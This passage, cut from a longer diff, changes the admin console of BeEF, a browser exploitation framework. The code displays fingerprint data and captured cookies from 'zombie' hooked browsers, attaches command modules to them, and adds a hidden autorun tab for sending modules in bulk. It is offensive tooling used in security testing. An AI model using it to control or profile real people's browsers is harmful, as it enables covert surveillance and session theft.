# set and add the return values for the date stamp
date_stamp = BD.get(zombie_session, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the hardware name
hw_name = BD.get(zombie_session, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
if not browser_name.nil?
friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
browser_name_hash = { 'Browser Name' => friendly_browser_name }
browser_name_row = {
'category' => 'Browser',
'data' => browser_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_name_row) # add the row
end
# set and add the return values for the browser version
browser_version = BD.get(zombie_session, 'BrowserVersion')
if not browser_version.nil?
encoded_browser_version = CGI.escapeHTML(browser_version)
browser_version_hash = { 'Browser Version' => encoded_browser_version }
browser_version_row = {
'category' => 'Browser',
'data' => browser_version_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_version_row) # add the row
end
# set and add the return values for the browser ua string
browser_uastring = BD.get(zombie_session, 'BrowserReportedName')
if not browser_uastring.nil?
browser_uastring_hash = { 'Browser UA String' => browser_uastring }
browser_uastring_row = {
'category' => 'Browser',
'data' => browser_uastring_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_uastring_row) # add the row
end
# set and add the list of cookies
cookies = BD.get(zombie_session, 'Cookies')
if not cookies.nil? and not cookies.empty?
encoded_cookies = CGI.escapeHTML(cookies)
encoded_cookies_hash = { 'Cookies' => encoded_cookies }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the list of plugins installed in the browser
browser_plugins = BD.get(zombie_session, 'BrowserPlugins')
if not browser_plugins.nil? and not browser_plugins.empty?
encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
page_name_row = {
'category' => 'Browser',
'data' => encoded_browser_plugins_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(zombie_session, 'SystemPlatform')
if not system_platform.nil?
encoded_system_platform = CGI.escapeHTML(system_platform)
encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
page_name_row = {
'category' => 'Host',
'data' => encoded_system_platform_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_size = BD.get(zombie_session, 'ScreenSize')
if not screen_size.nil?
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
(print_error "width is wrong type";return) if not width.is_a?(Fixnum)
height = screen_size_hash['height']
(print_error "height is wrong type";return) if not height.is_a?(Fixnum)
colordepth = screen_size_hash['colordepth']
(print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum)
# construct the string to be displayed in the details tab
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie browser window size
window_size = BD.get(zombie_session, 'WindowSize')
if not window_size.nil?
window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
(print_error "width is wrong type";return) if not width.is_a?(Fixnum)
height = window_size_hash['height']
(print_error "height is wrong type";return) if not height.is_a?(Fixnum)
# construct the string to be displayed in the details tab
encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
encoded_window_size_hash = { 'Window Size' => encoded_window_size }
page_name_row = {
'category' => 'Browser',
'data' => encoded_window_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for JavaEnabled
java_enabled = BD.get(zombie_session, 'JavaEnabled')
if not java_enabled.nil?
encoded_java_enabled = CGI.escapeHTML(java_enabled)
encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_java_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for VBScriptEnabled
vbscript_enabled = BD.get(zombie_session, 'VBScriptEnabled')
if not vbscript_enabled.nil?
encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_vbscript_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasFlash
has_flash = BD.get(zombie_session, 'HasFlash')
if not has_flash.nil?
encoded_has_flash = CGI.escapeHTML(has_flash)
encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_flash_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for hasPhonegap
has_phonegap = BD.get(zombie_session, 'hasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?
encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_googlegears_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasWebSocket
has_web_socket = BD.get(zombie_session, 'HasWebSocket')
if not has_web_socket.nil?
encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
encoded_has_web_socket_hash = { 'Has WebSockets' => encoded_has_web_socket }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_web_socket_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasActiveX
has_activex = BD.get(zombie_session, 'HasActiveX')
if not has_activex.nil?
encoded_has_activex = CGI.escapeHTML(has_activex)
encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_activex_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasSessionCookies
has_session_cookies = BD.get(zombie_session, 'hasSessionCookies')
if not has_session_cookies.nil?
encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_session_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasPersistentCookies
has_persistent_cookies = BD.get(zombie_session, 'hasPersistentCookies')
if not has_persistent_cookies.nil?
encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_persistent_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
@body = summary_grid_hash.to_json
@body = summary_grid_hash.to_json
end
# Returns the list of all command_modules in a JSON format
def select_all_command_modules
@body = command_modules2json(BeEF::Modules.get_enabled.keys)
@@ -562,10 +263,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
#Recursive function to sort all the parent's children
def sort_recursive_tree(parent)
# sort the children nodes by status and name
parent.each {|x|
parent.each {|x|
#print_info "Sorting: " + x['children'].to_s
if x.is_a?(Hash) and x.has_key?('children')
x['children'] = x['children'].sort_by {|a|
x['children'] = x['children'].sort_by {|a|
fldr = a['cls'] ? a['cls'] : 'zzzzz'
"#{fldr}#{a['status']}#{a['text']}"
}
@@ -649,20 +350,20 @@ class Modules < BeEF::Extension::AdminUI::HttpController
update_command_module_tree(tree, dyn_mod_category, command_module_icon_path, command_module_status, command_mod_name,dyn_mod.id)
}
end
# sort the parent array nodes
# sort the parent array nodes
tree.sort! {|a,b| a['text'] <=> b['text']}
sort_recursive_tree(tree)
retitle_recursive_tree(tree)
# return a JSON array of hashes
@body = tree.to_json
end
# Returns the inputs definition of an command_module.
def select_command_module
command_module_id = @params['command_module_id'] || nil
@@ -677,7 +378,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
@body = command_modules2json([key])
end
end
# Returns the list of commands for an command_module
def select_command_module_commands
commands = []
@@ -692,32 +393,32 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
# get the browser id
zombie = Z.first(:session => zombie_session)
(print_error "Zombie is nil";return) if zombie.nil?
zombie_id = zombie.id
(print_error "Zombie id is nil";return) if zombie_id.nil?
C.all(:command_module_id => command_module_id, :hooked_browser_id => zombie_id).each do |command|
commands.push({
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
'label' => command.label
})
i+=1
end
@body = {
'success' => 'true',
'success' => 'true',
'commands' => commands}.to_json
end
# Attaches an command_module to a zombie.
def attach_command_module
definition = {}
# get params
@@ -729,8 +430,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
@params.keys.each {|param|
@params.keys.each {|param|
(print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
(print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
definition[param[4..-1]] = params[param]
@@ -749,10 +450,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.
def reexecute_command_module
# get params
command_id = @params['command_id'] || nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -762,15 +463,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
command.instructions_sent = false
command.save
@body = '{success : true}'
end
def attach_dynamic_command_module
definition = {}
# get params
@@ -782,8 +483,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
@params.keys.each {|param|
@params.keys.each {|param|
(print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
(print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
definition[param[4..-1]] = params[param]
@@ -825,11 +526,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
end
# Returns the results of a command
def select_command_results
results = []
# get params
command_id = @params['command_id']|| nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -839,24 +540,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# get command_module
command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
(print_error "command_module is nil";return) if command_module.nil?
resultsdb = BeEF::Core::Models::Result.all(:command_id => command_id)
(print_error "Command id result is nil";return) if resultsdb.nil?
resultsdb.each{ |result| results.push({'date' => result.date, 'data' => JSON.parse(result.data)}) }
@body = {
'success' => 'true',
'success' => 'true',
'command_module_name' => command_module.name,
'command_module_id' => command_module.id,
'results' => results}.to_json
end
# Returns the definition of a command.
# In other words it returns the command that was used to command_module a zombie.
def select_command
# get params
command_id = @params['command_id'] || nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -873,9 +574,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
command_module_name = command_module.name
e = BeEF::Core::Command.const_get(command_module_name.capitalize).new(command_module_name)
end
@body = {
'success' => 'true',
'success' => 'true',
'command_module_name' => command_module_name,
'command_module_id' => command_module.id,
'data' => BeEF::Module.get_options(command_module_name),
@@ -883,9 +584,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
}.to_json
end
private
# Takes a list of command_modules and returns them as a JSON array
def command_modules2json(command_modules)
command_modules_json = {}
@@ -901,7 +602,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
command_modules_json[i] = h
i += 1
end
if not command_modules_json.empty?
return {'success' => 'true', 'command_modules' => command_modules_json}.to_json
else
@@ -912,15 +613,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# return the input requred for the module in JSON format
def dynamic_modules2json(id)
command_modules_json = {}
mod = BeEF::Core::Models::CommandModule.first(:id => id)
# if the module id is not in the database return false
return {'success' => 'false'}.to_json if(not mod)
# the path will equal Dynamic/<type> and this will get just the type
dynamic_type = mod.path.split("/").last
e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
e.update_info(mod.id)
e.update_data()
@@ -947,7 +648,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
return {'success' => 'true', 'command_modules' => payload_options_json}.to_json
end
end
end

9
extensions/admin_ui/controllers/panel/index.html
View File

@@ -13,12 +13,16 @@
<%= script_tag 'ext-base.js' %>
<%= script_tag 'ext-all.js' %>
<%= script_tag 'ext-beef.js' %>
<!-- jQuery encoder (ESAPI way) -->
<%= script_tag 'esapi/jquery-1.6.4.min.js' %>
<%= script_tag 'esapi/Class.create.js' %>
<%= script_tag 'esapi/jquery-encoder-0.1.0.js' %>
<script type="text/javascript" language="JavaScript">var $jEncoder = jQuery.noConflict();</script>
<!--/ jQuery encoder (ESAPI way) -->
<!-- BeEF Web UI common functions-->
<%= script_tag 'ui/common/beef_common.js' %>
<%= script_tag 'ux/TabCloseMenu.js' %>
<%= script_tag 'ux/StatusBar.js' %>
<%= script_tag 'ux/PagingStore.js' %>
@@ -37,7 +41,7 @@
<%= stylesheet_tag 'wterm.css' %>
<script type="text/javascript" language="JavaScript">var $jwterm = jQuery.noConflict();</script>
<%= script_tag 'ui/panel/tabs/ZombieTabIpec.js' %>
<%= script_tag 'ui/panel/tabs/ZombieTabAutorun.js' %>
<%= script_tag 'ui/panel/PanelViewer.js' %>
<%= script_tag 'ui/panel/DataGrid.js' %>
<%= script_tag 'ui/panel/MainPanel.js' %>
@@ -45,7 +49,6 @@
<%= script_tag 'ui/panel/ZombieTabs.js' %>
<%= script_tag 'ui/panel/zombiesTreeList.js' %>
<%= script_tag 'ui/panel/ZombiesMgr.js' %>
<%= script_tag 'ui/panel/Logout.js' %>
<%= script_tag 'ui/panel/WelcomeTab.js' %>
<!-- <%= script_tag 'ui/panel/HackVertorTab.js' %> -->

56
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -76,37 +76,47 @@ module BeEF
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_vlc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
return {
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_name' => browser_name,
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_name' => browser_name,
'browser_version' => browser_version,
'browser_icon' => browser_icon,
'os_icon' => os_icon,
'os_name' => os_name,
'hw_icon' => hw_icon,
'hw_name' => hw_name,
'has_flash' => has_flash,
'browser_icon' => browser_icon,
'os_icon' => os_icon,
'os_name' => os_name,
'hw_icon' => hw_icon,
'hw_name' => hw_name,
'has_flash' => has_flash,
'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears,
'has_java' => has_java,
'date_stamp' => date_stamp
'has_java' => has_java,
'has_activex' => has_activex,
'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime,
'has_vlc' => has_vlc,
'has_realplayer' => has_realplayer,
'date_stamp' => date_stamp
}
end

BIN
extensions/admin_ui/media/images/help/forge.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.6 KiB

BIN
extensions/admin_ui/media/images/help/history.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.6 KiB

BIN
extensions/admin_ui/media/images/help/proxy.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 9.4 KiB

BIN
extensions/admin_ui/media/images/icons/laptop.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
extensions/admin_ui/media/images/icons/vm.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.2 KiB

44
extensions/admin_ui/media/javascript/ui/common/beef_common.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* BeEF Web UI commons
*/
if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
var BeefWUI = {
rest_token: "",
/**
* Retrieve the token needed to call the RESTful API.
* This is obviously a post-auth call.
*/
get_rest_token: function() {
if(this.rest_token.length == 0){
var url = "/ui/modules/getRestfulApiToken.json";
jQuery.ajax({
contentType: 'application/json',
dataType: 'json',
type: 'GET',
url: url,
async: false,
processData: false,
success: function(data){
beefwui.rest_token = data.token;
},
error: function(){
beefwui.rest_token = "";
}
});
}
return this.rest_token;
}
};
window.beefwui = BeefWUI;
}

14
extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
View File

@@ -5,16 +5,14 @@
//
ZombieTab = function(zombie) {
main_tab = new ZombieTab_DetailsTab(zombie);
log_tab = new ZombieTab_LogTab(zombie);
commands_tab = new ZombieTab_Commands(zombie);
requester_tab = new ZombieTab_Requester(zombie);
xssrays_tab = new ZombieTab_XssRaysTab(zombie);
ipec_tab = new ZombieTab_IpecTab(zombie);
ZombieTab.superclass.constructor.call(this, {
autorun_tab = new ZombieTab_Autorun(zombie);
ZombieTab.superclass.constructor.call(this, {
id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
@@ -25,7 +23,13 @@ ZombieTab = function(zombie) {
forceFit: true,
type: 'fit'
},
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab]
items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
listeners:{
afterrender:function(component){
// Hide auto-run tab
component.hideTabStripItem(autorun_tab);
}
}
});
};

40
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -5,10 +5,10 @@
//
var ZombiesMgr = function(zombies_tree_lists) {
//save the list of trees in the object
this.zombies_tree_lists = zombies_tree_lists;
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
@@ -26,7 +26,12 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"];
var has_java = zombie_array[index]["has_java"];
var has_activex = zombie_array[index]["has_activex"];
var has_vlc = zombie_array[index]["has_vlc"];
var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"];
var date_stamp = zombie_array[index]["date_stamp"];
text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -40,11 +45,16 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp;
var new_zombie = {
'id' : index,
'ip' : ip,
@@ -55,10 +65,10 @@ var ZombiesMgr = function(zombies_tree_lists) {
'domain' : domain,
'port' : port
};
return new_zombie;
}
/*
* Update the hooked browser trees
* @param: {Literal Object} an object containing the list of offline and online hooked browsers.
@@ -67,33 +77,33 @@ var ZombiesMgr = function(zombies_tree_lists) {
this.updateZombies = function(zombies, rules){
var offline_hooked_browsers = zombies["offline"];
var online_hooked_browsers = zombies["online"];
for(tree_type in this.zombies_tree_lists) {
hooked_browsers_tree = this.zombies_tree_lists[tree_type];
//we compare and remove the hooked browsers from online and offline branches for each tree.
hooked_browsers_tree.compareAndRemove(zombies);
//add an offline browser to the tree
for(var i in offline_hooked_browsers) {
var offline_hooked_browser = this.zombieFactory(i, offline_hooked_browsers);
hooked_browsers_tree.addZombie(offline_hooked_browser, false, ((tree_type != 'basic') ? true : false));
}
//add an online browser to the tree
for(var i in online_hooked_browsers) {
var online_hooked_browser = this.zombieFactory(i, online_hooked_browsers);
hooked_browsers_tree.addZombie(online_hooked_browser, true, ((tree_type != 'basic') ? true : false));
}
//apply the rules to the tree
hooked_browsers_tree.applyRules(rules);
//expand the online hooked browser tree lists
if(hooked_browsers_tree.online_hooked_browsers_treenode.childNodes.length > 0) {
hooked_browsers_tree.online_hooked_browsers_treenode.expand(true);
}
//expand the offline hooked browser tree lists
if(hooked_browsers_tree.offline_hooked_browsers_treenode.childNodes.length > 0) {
hooked_browsers_tree.offline_hooked_browsers_treenode.expand(true);

336
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js Normal file
View File

@@ -0,0 +1,336 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*
* The command tab panel. Listing the list of commands sent to the zombie.
* Loaded in /ui/panel/index.html
*/
function generate_form_input_field(form, input, value, disabled, zombie) {
var input_field = null;
var input_def = null;
if (!input['ui_label'])
input['ui_label'] = input['name'];
if (!input['type'])
input['type'] = 'textfield';
if (!input['value'])
input['value'] = '';
input_def = {
id: 'form-zombie-'+zombie.session+'-field-'+input['name'],
name: 'txt_'+input['name'],
fieldLabel: input['ui_label'],
anchor:'70%',
allowBlank: false,
value: input['value']
};
// create the input field object based upon the type supplied
switch(input['type'].toLowerCase()) {
case 'textfield':
input_field = new Ext.form.TextField(input_def);
break;
case 'textarea':
input_field = new Ext.form.TextArea(input_def);
break;
case 'hidden':
input_field = new Ext.form.Hidden(input_def);
break;
case 'label':
input_def['fieldLabel'] = '';
input_def['html'] = input['html'];
input_field = new Ext.form.Label(input_def);
break;
case 'checkbox':
input_def['name'] = 'chk_' + input['name'];
input_field = new Ext.form.Checkbox(input_def);
break;
case 'checkboxgroup':
input_def['name'] = 'chkg_' + input['name'];
input_def['items'] = input['items'];
input_field = new Ext.form.CheckboxGroup(input_def);
break;
case 'combobox':
input_def['name'] = 'com_' + input['name'];
input_def['triggerAction'] = 'all';
if(input.reloadOnChange || input.defaultPayload != null) {
// defined in msfcommand.rb
// initially the panel will be empty so it may appear still hidden
Ext.getCmp("payload-panel").show();
input_def['listeners'] = {
// update the payload options when one of them is selected
'select': function(combo, value) {
get_dynamic_payload_details(combo.getValue(), zombie);
},
// set the default payload value as defined in defaultPayload
'afterrender': function(combo){
combo.setValue(input.defaultPayload);
get_dynamic_payload_details(combo.getValue(),zombie);
}
};
}
// create store to contain options for the combo box
input_def['store'] = new Ext.data.ArrayStore( {
fields: input['store_fields'],
data: input['store_data']
});
input_field = new Ext.form.ComboBox(input_def);
break;
default:
input_field = new Ext.form.TextField(input_def);
break;
}
// add the properties for the input element, for example: widths, default values and the html lables
for(definition in input) {
if( (typeof input[definition] == 'string') && (definition != 'type') && (definition != 'name')) {
input_field[definition] = input[definition];
}
}
if(value)
input_field.setValue(value);
if(disabled)
input_field.setDisabled(true);
form.add(input_field);
}
function get_module_details(id,token){
var mod = null;
var url = "/api/modules/"+id+"?token="+token;
$jwterm.ajax({
contentType: 'application/json',
dataType: 'json',
type: 'GET',
url: url,
async:false,
processData: false,
success: function(data){
mod = data;
}
});
//add module id which is not returned by the RESTful API
mod['id'] = id;
return mod;
}
function process_module_opts(mod){
var mod_json = {
'mod_id': mod['id'],
'mod_input':[]
};
var opts = mod['options'];
var label='ui_label';
var type = 'type';
var type_val;
var label_val;
var value;
var type;
var key = value = label = type_val = "";
var input;
if(opts.length > 0){
for( var i=0;i<opts.length;i++){
input = {};
key = opts[i]['name'];
value = opts[i]['value'];
type_val = opts[i]['type'];
label_val = opts[i][label];
input[key]=value;
input[label]=label_val;
input[type] = type_val;
mod_json['mod_input'].push(input);
}
}
return mod_json;
}
function send_modules(token,module_data){
var url = "/api/modules/multi_module"+"?token="+token;
var payload = Ext.encode(module_data);
$jwterm.ajax({
contentType: 'application/json',
data: payload,
dataType: 'json',
type: 'POST',
url: url,
async:false,
processData: false,
success: function(data){
var results = data;
}
});
}
/* Creates the same tree as the command module list*/
ZombieTab_Autorun = function(zombie) {
var token = beefwui.get_rest_token();
var details_panel = new Ext.FormPanel({
id: "zombie-autorun_details"+zombie.session,
title: "Module Details",
region:'west',
border: true,
width: 250,
minSize: 250,
